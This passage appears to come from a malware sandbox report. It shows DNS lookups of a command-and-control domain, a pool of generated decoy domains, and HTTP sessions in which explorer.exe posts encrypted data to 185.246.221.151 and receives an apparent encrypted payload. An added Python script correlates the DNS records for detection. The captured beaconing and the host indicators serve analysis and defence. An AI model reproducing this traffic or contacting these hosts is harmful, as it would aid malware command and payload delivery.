Nov 30, 2022 00:12:33.212548971 CET | 8.8.8.8 | 192.168.2.7 | 0xd2b9 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:33.821990967 CET | 8.8.8.8 | 192.168.2.7 | 0xd702 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:34.036792994 CET | 8.8.8.8 | 192.168.2.7 | 0xde7c | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:34.488857985 CET | 8.8.8.8 | 192.168.2.7 | 0x80e4 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:34.669634104 CET | 8.8.8.8 | 192.168.2.7 | 0x2609 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:34.851197958 CET | 8.8.8.8 | 192.168.2.7 | 0xbf35 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:35.319250107 CET | 8.8.8.8 | 192.168.2.7 | 0x883f | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:35.494378090 CET | 8.8.8.8 | 192.168.2.7 | 0xef7 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:35.672054052 CET | 8.8.8.8 | 192.168.2.7 | 0x7e44 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:35.871113062 CET | 8.8.8.8 | 192.168.2.7 | 0xb4f1 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:36.067956924 CET | 8.8.8.8 | 192.168.2.7 | 0x6dd1 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:36.359834909 CET | 8.8.8.8 | 192.168.2.7 | 0x8b45 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:36.543272018 CET | 8.8.8.8 | 192.168.2.7 | 0x7568 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:36.996306896 CET | 8.8.8.8 | 192.168.2.7 | 0x4443 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:37.183329105 CET | 8.8.8.8 | 192.168.2.7 | 0xc6d7 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:37.373538971 CET | 8.8.8.8 | 192.168.2.7 | 0x2915 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:37.549065113 CET | 8.8.8.8 | 192.168.2.7 | 0x8766 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:37.750535965 CET | 8.8.8.8 | 192.168.2.7 | 0xdb37 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:37.969152927 CET | 8.8.8.8 | 192.168.2.7 | 0x67f0 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:38.158756018 CET | 8.8.8.8 | 192.168.2.7 | 0xebc7 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:38.360474110 CET | 8.8.8.8 | 192.168.2.7 | 0xb147 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:38.774048090 CET | 8.8.8.8 | 192.168.2.7 | 0x39bd | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:39.002141953 CET | 8.8.8.8 | 192.168.2.7 | 0xccea | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:39.242450953 CET | 8.8.8.8 | 192.168.2.7 | 0x2155 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:39.526495934 CET | 8.8.8.8 | 192.168.2.7 | 0xa014 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:40.349824905 CET | 8.8.8.8 | 192.168.2.7 | 0xec7a | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
                          • kqgkblakc.com
                            • r3oidsofsios.com
                          • ryjwkat.net
                          • ewfonmrybp.org
                          • hraesy.net
                          • vqnwxa.org
                          • sqyiaue.net
                          • cygghp.com
                          • dtxwodx.net
                          • wypuksbjb.org
                          • qgjuekrsef.net
                          • rlovsbdvn.net
                          • ugjjaam.net
                          • poflgkd.org
                          • vshacsl.org
                          • kabjenh.com
                          • vyukg.com
                          • xnfwjbsuvp.com
                          • nvftibg.com
                          • okade.org
                          • iungf.org
                          • bhqtkqlvvb.org
                          • whvkq.com
                          • rspyhp.net
                          • jvjyarecuw.net
                          • hrxqxa.net
                          • uwoxt.net
                          • bqruytosp.com
                          • lclth.com
                          • vreqndf.com
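In the two DNS tables above the same name, r3oidsofsios.com, is queried 29 times in about nine seconds, each time with a fresh transaction ID, and every answer returns 185.246.221.151; of the 30 names in the list above, only that one appears in the capture (kqgkblakc.com shows up only as the Referer of the HTTP request further down). The following Python is an added example, not code from the report or the sandbox: it pairs queries with answers by transaction ID, flags a name that is re-queried inside a short window with distinct IDs (separate requests, not retransmissions), and checks the domain list against what actually resolved. The records are a transcribed subset of the tables; the window and count thresholds are this example's own assumptions.

```python
"""Correlate sandbox DNS queries with their answers and flag a name that is
looked up over and over inside a short window.

Added example for this report; not Joe Sandbox code. QUERIES and ANSWERS are
a transcribed subset of the two DNS tables, DOMAIN_POOL is the report's domain
list, and the thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime

EPOCH = datetime(1970, 1, 1)


def parse_ts(s):
    """'Nov 30, 2022 00:12:31.576731920 CET' -> float seconds (zone label ignored)."""
    body = s.rsplit(" ", 1)[0]
    main, frac = body.split(".")
    secs = (datetime.strptime(main, "%b %d, %Y %H:%M:%S") - EPOCH).total_seconds()
    return secs + int(frac) / 10 ** len(frac)


# (timestamp, transaction id, name) from the "Standard query" table
QUERIES = [
    ("Nov 30, 2022 00:12:31.576731920 CET", 0xe620, "r3oidsofsios.com"),
    ("Nov 30, 2022 00:12:32.519501925 CET", 0x9a00, "r3oidsofsios.com"),
    ("Nov 30, 2022 00:12:33.003753901 CET", 0xcb73, "r3oidsofsios.com"),
    ("Nov 30, 2022 00:12:33.193178892 CET", 0xd2b9, "r3oidsofsios.com"),
    ("Nov 30, 2022 00:12:33.470622063 CET", 0xd702, "r3oidsofsios.com"),
    ("Nov 30, 2022 00:12:34.020052910 CET", 0xde7c, "r3oidsofsios.com"),
    ("Nov 30, 2022 00:12:34.196407080 CET", 0x80e4, "r3oidsofsios.com"),
    ("Nov 30, 2022 00:12:34.650456905 CET", 0x2609, "r3oidsofsios.com"),
]
# (timestamp, transaction id, name, reply code, address) from the answer table
ANSWERS = [
    ("Nov 30, 2022 00:12:31.867197037 CET", 0xe620, "r3oidsofsios.com", 0, "185.246.221.151"),
    ("Nov 30, 2022 00:12:32.811173916 CET", 0x9a00, "r3oidsofsios.com", 0, "185.246.221.151"),
    ("Nov 30, 2022 00:12:33.028825998 CET", 0xcb73, "r3oidsofsios.com", 0, "185.246.221.151"),
    ("Nov 30, 2022 00:12:33.212548971 CET", 0xd2b9, "r3oidsofsios.com", 0, "185.246.221.151"),
    ("Nov 30, 2022 00:12:33.821990967 CET", 0xd702, "r3oidsofsios.com", 0, "185.246.221.151"),
    ("Nov 30, 2022 00:12:34.036792994 CET", 0xde7c, "r3oidsofsios.com", 0, "185.246.221.151"),
    ("Nov 30, 2022 00:12:34.488857985 CET", 0x80e4, "r3oidsofsios.com", 0, "185.246.221.151"),
    ("Nov 30, 2022 00:12:34.669634104 CET", 0x2609, "r3oidsofsios.com", 0, "185.246.221.151"),
]
# The report's domain list; kqgkblakc.com is also the Referer of the HTTP request.
DOMAIN_POOL = [
    "kqgkblakc.com", "r3oidsofsios.com", "ryjwkat.net", "ewfonmrybp.org", "hraesy.net",
    "vqnwxa.org", "sqyiaue.net", "cygghp.com", "dtxwodx.net", "wypuksbjb.org",
    "qgjuekrsef.net", "rlovsbdvn.net", "ugjjaam.net", "poflgkd.org", "vshacsl.org",
    "kabjenh.com", "vyukg.com", "xnfwjbsuvp.com", "nvftibg.com", "okade.org",
    "iungf.org", "bhqtkqlvvb.org", "whvkq.com", "rspyhp.net", "jvjyarecuw.net",
    "hrxqxa.net", "uwoxt.net", "bqruytosp.com", "lclth.com", "vreqndf.com",
]


def correlate(queries, answers):
    """Match each query to its answer by (transaction id, name); unanswered queries keep None."""
    by_key = {(txid, name): (parse_ts(ts), rcode, addr) for ts, txid, name, rcode, addr in answers}
    out = []
    for ts, txid, name in queries:
        q = parse_ts(ts)
        ans = by_key.get((txid, name))
        out.append({
            "ts": q, "txid": txid, "name": name,
            "rtt": None if ans is None else ans[0] - q,
            "rcode": None if ans is None else ans[1],
            "address": None if ans is None else ans[2],
        })
    return out


def repeated_lookups(records, window=10.0, min_count=5):
    """Names queried at least `min_count` times inside `window` seconds. The number of
    distinct transaction IDs separates genuine new lookups from retransmissions,
    which reuse the ID."""
    per_name = defaultdict(list)
    for r in records:
        per_name[r["name"]].append(r)
    hits = {}
    for name, rs in per_name.items():
        rs.sort(key=lambda r: r["ts"])
        span = rs[-1]["ts"] - rs[0]["ts"]
        if len(rs) >= min_count and span <= window:
            hits[name] = {
                "count": len(rs), "span": span,
                "distinct_txids": len({r["txid"] for r in rs}),
                "addresses": sorted({r["address"] for r in rs if r["address"]}),
            }
    return hits


def pool_status(pool, records):
    """Split a candidate domain list into names that resolved in the capture and names never seen."""
    seen = {r["name"]: r["address"] for r in records if r["address"]}
    resolved = {d: seen[d] for d in pool if d in seen}
    unseen = [d for d in pool if d not in seen]
    return resolved, unseen


if __name__ == "__main__":
    recs = correlate(QUERIES, ANSWERS)
    print(repeated_lookups(recs))
    print(pool_status(DOMAIN_POOL, recs))
```

On the transcribed subset this reports eight lookups of one name in about 3.1 s with eight distinct transaction IDs, all answered with the same address, and a pool in which one of thirty names resolved. A name that keeps being re-resolved on the wire every few hundred milliseconds, despite a positive answer each time, is worth correlating with the connection log: here every lookup precedes one of the short TCP connections to 185.246.221.151.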
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49715 | 185.246.221.151 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 30, 2022 00:12:31.899173021 CET | 124 | OUT | POST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://kqgkblakc.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 323
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:31.899214029 CET124OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d3 66 97 02 1f d3 27 f2 fe 75 d5 74 03 5e
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f'ut^q)[tkXOaG#'@:(OR+&>;##C6+-@J"7p# h1~rXA25K>u!5([SU%:_%hatFB|gtY)
Nov 30, 2022 00:12:32.019617081 CET | 126 | IN | HTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:31 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Connection: close
                          Transfer-Encoding: chunked
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 32 37 34 66 65 0d 0a 2f 00 00 00 8f 3b 41 39 46 2c cf 62 b4 69 4c 7a ea be ee 06 5f 4c ee 8e a8 e1 af 06 13 a0 cc 71 e9 ea 11 2f 96 e3 88 cb 32 b7 9a 95 e1 3c f7 13 c7 f8 58 00 ca 74 02 00 1c ac 2b da 00 0b 07 00 09 00 34 00 00 01 54 b5 a6 04 fa 19 13 50 fe ad bf fe 50 01 0b 00 6b 6d 9b a1 be 47 6b 95 bb 2f 20 d4 c8 8f 3e f9 48 d9 5d 6d 65 6d 75 16 dc 93 04 9a 4e 3d 6e 00 a7 fb c4 e6 ba 10 81 4e de c9 81 63 bd 6b c1 21 12 08 03 82 92 b9 66 33 2c c4 d8 a4 26 81 d2 23 e6 f5 f0 39 01 b1 f6 c3 ff ed 03 02 bb a2 cb aa 25 f7 50 36 a5 43 cb 97 a8 89 2f 73 18 41 7c 38 c8 25 6c e3 2a 3c 5c 31 22 93 fa eb 08 47 0a cb 81 c7 f6 64 05 28 c2 6a 21 d2 ce 9f ad 76 7d 4a 1a d8 92 2f 8c 78 c6 24 f2 d6 cf 6b fb c5 e7 05 b0 1f 95 8d a2 26 fc ad 77 7d 1f 5b 65 2f 3f 20 47 56 ae f1 94 d8 e8 af 02 9c 35 87 be c3 a6 6b 91 75 5d 48 ac 3a 7e a2 d9 1c ad 62 4f e2 8d fa e3 a9 4d d6 02 65 2c a5 97 c6 61 03 59 fc 1d d4 88 16 72 64 45 ef 71 50 7d 98 6f 6e 3b 4c 4a 24 46 46 d2 e5 01 0f 29 c5 77 b5 91 d2 cf 70 47 4e 70 90 b9 1a e8 a3 c8 f4 35 b3 7d 94 47 eb 9e 1c 83 1b 9f 2b 04 01 20 1b 5d 82 c5 96 4e c0 54 3b 64 88 1b 82 ad a0 f7 12 e2 23 b3 67 bd 67 b8 6c d5 2e df 89 bb 99 b8 f8 a8 37 72 14 26 37 4c 36 33 93 ea 14 9f fc 79 88 6c 52 f9 4b a8 4b 79 72 fe 17 4a 97 56 fc 2c 49 19 fe ac 9b 63 57 59 57 b2 6d 42 86 48 71 26 85 c8 e9 46 b3 be 7d 6e 49 77 a0 bc d7 28 3b 4d 72 ba 0f 96 20 d8 e2 f0 06 2a 13 f4 31 f3 75 9d 49 ed a3 a9 16 2a be 8b 64 65 69 55 b5 88 be 3d 47 b3 fd d6 b1 69 98 52 de 77 cb ee 26 12 15 57 48 43 74 87 cc a7 87 b5 da 57 bd 62 db 5b 02 16 5b 43 da 83 e9 7d eb 69 ba cb 94 e0 d3 9c 36 d6 e8 5e 61 b8 d3 7c 0b 4f 5f d4 5f 20 84 6f 29 33 35 f8 06 1c 4b 74 4f 8b c3 37 09 e9 f0 3f 99 f4 29 aa d7 6c e4 9b 7d 8d 35 38 05 d8 ed 28 87 b4 7c 23 20 1a 4c 17 4f d3 f2 78 47 99 4d 46 4c ff 34 b5 cf ce 58 f4 58 6b ff 58 95 63 70 fe 45 7b 44 6a 9d 01 70 a4 96 d5 37 e9 53 35 1c ec 0d 77 3d 02 33 8a 5d 4f 02 f9 f2 29 23 5a ba c1 49 cd e4 b9 8f de 25 c8 51 82 ca ba 
10 3a 0d e9 c9 3c 79 23 63 02 10 48 3f 91 d7 9d ee 95 29 de 70 a0 eb 9f 55 33 e8 17 3e 67 82 d3 5f 4a b1 d1 1c b2 35 6f e1 d4 36 68 1c b3 19 84 3c 49 ae 3a bf 98 c3 68 29 98 be f9 8d 66 0e 59 d3 88 1d a4 ea 06 bc 7f ab de 5a 8a 42 d8 ab 4a ed 7b 02 99 5f 31 df c6 ae 1b 3c a7 00 1c 42 02 01 1b 9b b8 5a 93 aa ba 49 d3 17 c5 0a f3 97 e0 63 f3 d1 e5 b9 41 bb 2a 06 24 ad af b9 25 17 3b f1 9b 84 1e ce 34 9c 3a 66 91 81 a2 ef 69 19 74 61 e8 33 37 39 af ed b1 65 c2 c3 f9 b0 fa f4 1c 64 c9 43 62 b0 fb e1 82 2e 1e ff a9 5b 8f 2c 06 1c 99 47 12 ba b9 cb de a6 fb 99 d6 48 4c ef 17 cd 38 c0 b1 f7 5c 4d 17 a5 55 86 f6 0f 6e 91 4f 16 df 22 08 2a 6e 37 d0 e4 00 c5 68 60 4a 30 1a 94 6b 3c 70 15 50 86 ac e2 b2 6c 59 c9 04 da 97 f7 61 7d 85 31 2d cb 9f 14 c0 72 fd 91 84 ff e6 9b 97 bb 1d 2c 7e fc 66 96 1e 85 41 67 5c 41 d7 d5 63 7c 55 a6 73 68 f1 7b 06 63 c1 43 53 6d 2b a9 b8 33 17 10 93 0d fe 52 14 cc f6 03 5c e0 17 a5 ac 37 e9 a8 44 fd 01 bc 68 42 c4 5e d8 07 96 b1 8d 7e c5 23 ef d2 c8 90 b5 3f 98 00 4e fc b3 2b e5 63 ae 4b 20 88 a4 58 65 ea ee a5 8e ae 58 00 2f a2 f5 7d a4 00 27 83 21 dd 64 5f c1 fd 28 0d e4 0a ba 64 a5 46 2b 8e 08 5d 0b c1 01 73 70 2a 14 62 03 02 76 c4 e9 ba 55 07 90 08 37 a5 ef 08 a8 1c 1e e3 16 8a de d8 01 1a 83 4a 26 dd 0d 32 28 90 ae 25 2c ee 52 ae 71 73 0d 95 e7 11 2d 4e a5 dd fd 5f b1 09 99 ed be 2a e9 0b 03 a0 cc 0c eb
                          Data Ascii: 274fe/;A9F,biLz_Lq/2<Xt+4TPPkmGk/ >H]memuN=nNck!f3,&#9%P6C/sA|8%l*<\1"Gd(j!v}J/x$k&w}[e/? GV5ku]H:~bOMe,aYrdEqP}on;LJ$FF)wpGNp5}G+ ]NT;d#ggl.7r&7L63ylRKKyrJV,IcWYWmBHq&F}nIw(;Mr *1uI*deiU=GiRw&WHCtWb[[C}i6^a|O__ o)35KtO7?)l}58(|# LOxGMFL4XXkXcpE{Djp7S5w=3]O)#ZI%Q:<y#cH?)pU3>g_J5o6h<I:h)fYZBJ{_1<BZIcA*$%;4:fita379edCb.[,GHL8\MUnO"*n7h`J0k<pPlYa}1-r,~fAg\Ac|Ush{cCSm+3R\7DhB^~#?N+cK XeX/}'!d_(dF+]sp*bvU7J&2(%,Rqs-N_*
Nov 30, 2022 00:12:32.019654036 CET | 127 | IN | Data Raw: 1b d8 27 46 6b a5 cf d9 84 0f a2 38 07 df bf 95 9a 91 dd bf 7d 90 86 61 bb bb 44 4a ab 65 90 82 9f 02 6a 66 ed d5 48 0b 74 31 30 ce 07 c0 36 77 e4 24 d9 1a 4d 03 38 87 53 f5 76 84 36 3f a0 c8 9e 93 81 1a 8c d7 7d f2 39 74 03 73 09 8a e8 00 c4 6b
Data Ascii: 'Fk8}aDJejfHt106w$M8Sv6?}9tsko?0:~<6SV)$)UL3u,e>K[L<NVqgV(DS:jV9JHUhEHsRRqqn^E7:{a`E2~'%AyV"0
Nov 30, 2022 00:12:32.019699097 CET | 128 | IN | Data Raw: c0 f1 fd 09 4b 66 52 c6 42 54 db a7 2a 02 3f 74 6a 8c f7 82 b0 f3 33 43 24 c5 1e b8 f6 f9 8d fd db e6 aa 0d 5d d5 b6 b0 99 a4 2d 86 4d 3a c8 d7 80 ec b3 ef 43 68 d7 d6 2a e6 45 2b 8d 90 9d d9 51 95 31 ee 96 00 69 e9 40 a6 b9 99 1e c4 40 8e ae a0
Data Ascii: KfRBT*?tj3C$]-M:Ch*E+Q1i@@RKQUN^n7IS,^gIB#RT+T-t{xd|,(,HOYsXz[6&NtQX;QaA4%dV,vAMN:D$]'o
Nov 30, 2022 00:12:32.019731998 CET | 130 | IN | Data Raw: 27 bb 5f d1 3d e9 86 c2 4f da 97 ac 2b 6d ff cb 1d 57 d1 2e 97 d4 6c a4 9f 78 ca 3a bb 08 23 66 9f a5 1c 73 9d df 48 56 03 82 4b 24 24 fc 9e de b7 c9 98 79 ee b2 65 a3 72 7d da ca e9 1c 7a f6 21 5d 01 ce 96 c1 89 51 66 fa 27 29 c0 1e 40 ce 58 da
Data Ascii: '_=O+mW.lx:#fsHVK$$yer}z!]Qf')@XC!\&3P[YIf[_#HvpFG?[}zTu|tty`jiM<T}Pmmc3+3]rnvSA*>6Z?IY}q*.
Nov 30, 2022 00:12:32.019763947 CET | 131 | IN | Data Raw: d4 69 e3 d1 9f bb ee c9 c3 86 8e cc 10 cc 03 65 cf 30 af d3 12 04 80 d0 a8 1e 47 ba aa d8 67 30 a6 47 9f 1f 93 57 fc 57 6d e4 6b 80 53 d0 5e 4d a0 0c 0d 3c 8b 39 0b b4 13 82 ab 76 a9 f3 2d 94 12 42 b6 ac 9f 11 e9 4a 6d 24 f6 f6 3c e2 a9 9c 26 d7
Data Ascii: ie0Gg0GWWmkS^M<9v-BJm$<&oK1SkR8N!o4swoN:*A`!"0T$r\)&SvX2B Ge5|NBG-@HP8Y 7bn]LH<xY.3l{{r6\n
Nov 30, 2022 00:12:32.019814014 CET | 132 | IN | Data Raw: da 8b 1e f1 a5 27 e9 04 a1 cb f5 4c 83 e1 0b ea e6 d8 97 ef d3 cb e9 eb 7c 70 a9 c4 c2 ce 1a 7f d8 1a f9 e8 5a d5 18 bc d9 14 8d 33 2d 0b 7d cf 39 68 ad d3 06 3a ff fb 96 34 3b bf 53 cc be 43 49 76 c8 c7 76 c2 04 f8 7c 0c 86 24 3a 8b d0 0c c8 31
Data Ascii: 'L|pZ3-}9h:4;SCIvv|$:1["`ifwmBx%~&nWa=XU$OQ.IX9d$HOI_\wTvPx<Z7VD|rT0Pk{C*ORtm}7&P
Nov 30, 2022 00:12:32.019865036 CET | 134 | IN | Data Raw: 19 49 73 0a 22 e7 63 05 1e 44 86 2f fd be 71 46 22 f9 96 dd 06 da 78 61 a8 69 94 04 3d 9f fc fd 79 cc 71 57 79 77 10 6d 54 77 a5 a1 d6 73 f0 8d 4c 22 6c 4d 3a 53 14 69 e8 12 7f cc 43 8b cc a6 d9 87 98 5e 84 87 3f 78 b3 b5 17 5e 6c ca 6b bc d9 d3
Data Ascii: Is"cD/qF"xai=yqWywmTwsL"lM:SiC^?x^lk2ZLG6\'-s,5nW!kraTI`[-q+O3lxbUf+x`qq="a3dF:ieepCqYDD.&~6sUW`1mhW>L_C
Nov 30, 2022 00:12:32.019922972 CET | 135 | IN | Data Raw: 98 3a 28 e8 c4 46 97 49 06 2b dc cf 9e 10 76 f7 44 0a 90 03 2d b8 c2 04 a9 4a 4f fc 7e 0b 67 19 8e de 91 db 72 4a 95 ad b7 8e 1d af 81 f6 8d 56 68 29 bc 1b 12 e5 42 52 a0 56 58 05 bb 13 f9 97 19 24 9d 5a c2 48 72 fd e3 a1 8f 73 8b 4e 01 87 ed b6
Data Ascii: :(FI+vD-JO~grJVh)BRVX$ZHrsNF;X/}iNQ.F`BI@_N{HOp;eoFs%WqWPJuDSjK^A9aiG@<dI(S]j5~FmS
Nov 30, 2022 00:12:32.019973040 CET | 136 | IN | Data Raw: fb 57 63 0a 15 fc 0c e2 b8 d9 f1 2a 48 e6 9e 4e d7 88 7b 33 45 22 e7 86 3d a0 5b 9a 69 b3 e0 1f c1 93 5e 71 3e 16 f0 ec 39 32 32 46 6c 4b 52 48 32 0e 06 bc e6 dd b3 dc 7e a9 c3 21 24 11 9b b7 1c df a4 13 3e fc 47 9d 08 c1 d4 9d e6 5a dd 14 6c 55
Data Ascii: Wc*HN{3E"=[i^q>922FlKRH2~!$>GZlU}G'QO]#o~l{aq`w)e Mh#l\>lo)w>KyQpcE[hnZHj-M2}F!l0Zh.QcX}
Nov 30, 2022 00:12:32.020023108 CET | 138 | IN | Data Raw: 48 cf d2 75 c7 0d c0 4e 6b 8a f9 5e b9 17 72 ec 9b 66 77 e7 70 b5 74 d5 41 66 b9 a3 9c 05 da 0d f2 a9 27 f9 c3 e1 16 27 c7 85 28 1b a3 a1 a8 eb ca 29 3b f3 5a d5 e1 58 1b 55 a4 bb 76 71 d6 3b eb 5b 47 3a 47 90 20 b0 28 2f 79 be c2 bb eb a6 ba ed
Data Ascii: HuNk^rfwptAf''();ZXUvq;[G:G (/y'd3O)5%2(}c-XK]Y\dWt$V\EfLEa^xJvjQK'Qti!H`]xYE<(E4+?s
Nov 30, 2022 00:12:32.049228907 CET | 139 | IN | Data Raw: a3 52 08 91 dc a8 22 bc 47 ea b5 31 9e b4 09 cf 91 5f 5e a1 37 fa 19 5d 19 e3 82 27 79 1a 8f 2c 1d eb df 9e 52 80 e6 49 fc ff fd c8 d7 93 91 89 29 67 e8 f6 52 81 1a f5 09 5c 44 6d 41 72 3a ad 66 68 d2 0a e8 d8 29 89 6d 08 eb 6a 31 d9 54 a6 01 03
Data Ascii: R"G1_^7]'y,RI)gR\DmAr:fh)mj1T}mVjg7S~n%HNbeK?\Q|t=@(v9`L%c".wl`w0[N,Z+xJ+oS_C1~s^UfZ;X)a\


Session ID: 1 | Source: 192.168.2.7:49716 | Destination: 185.246.221.151:80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 30, 2022 00:12:32.851701021 CET | 293 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ryjwkat.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 311
Host: r3oidsofsios.com
Nov 30, 2022 00:12:32.851907015 CET | 293 | OUT | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 97 02 1f d3 26 f2 fe 75 b6 59 2f 5b
Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uY/[8m:w6_HA^i{S2<wN&QY(`|b2x9;(e@kK-<!;p,uQ#[BxoRc%,A@G&"sY01@7*`a8a5+
Nov 30, 2022 00:12:32.977070093 CET | 294 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Nov 2022 23:12:32 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8


Session ID: 10 | Source: 192.168.2.7:49725 | Destination: 185.246.221.151:80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 30, 2022 00:12:35.522797108 CET | 306 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rlovsbdvn.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 350
Host: r3oidsofsios.com
Nov 30, 2022 00:12:35.522823095 CET | 306 | OUT | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 9e 02 1f d3 26 f2 fe 75 f8 5f 5a 51
Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&u_ZQ\_CA3CZSXSZP9u:os3^"cgLAk9{8 fV{(GD7wzuE=9_B'N:o<;~^4 {U P{Qjh8
Nov 30, 2022 00:12:35.638067961 CET | 307 | IN | HTTP/1.1 404 Not Found
Date: Tue, 29 Nov 2022 23:12:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 404
Connection: close
Content-Type: text/html; charset=utf-8
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 